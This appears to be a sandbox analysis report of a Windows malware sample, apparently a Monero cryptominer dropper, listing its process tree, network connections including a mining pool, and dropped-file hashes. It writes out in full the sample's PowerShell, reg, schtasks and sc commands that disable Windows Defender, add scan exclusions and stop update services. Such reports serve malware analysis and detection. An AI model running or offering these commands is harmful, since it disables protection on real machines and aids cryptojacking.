C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 1763FE87C3B24A10656D2C12B0EB9F30 E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Windows\Installer\MSIA5F4.tmp

"C:\Windows\Installer\MSIA5F4.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA617.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA604.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA605.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA606.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6F9.tmp\A6FA.tmp\A6FB.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\Installer\MSIDAD1.tmp

"C:\Windows\Installer\MSIDAD1.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSIDAD2.tmp

"C:\Windows\Installer\MSIDAD2.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSIDAE3.tmp

"C:\Windows\Installer\MSIDAE3.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 211.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 90.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 175.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
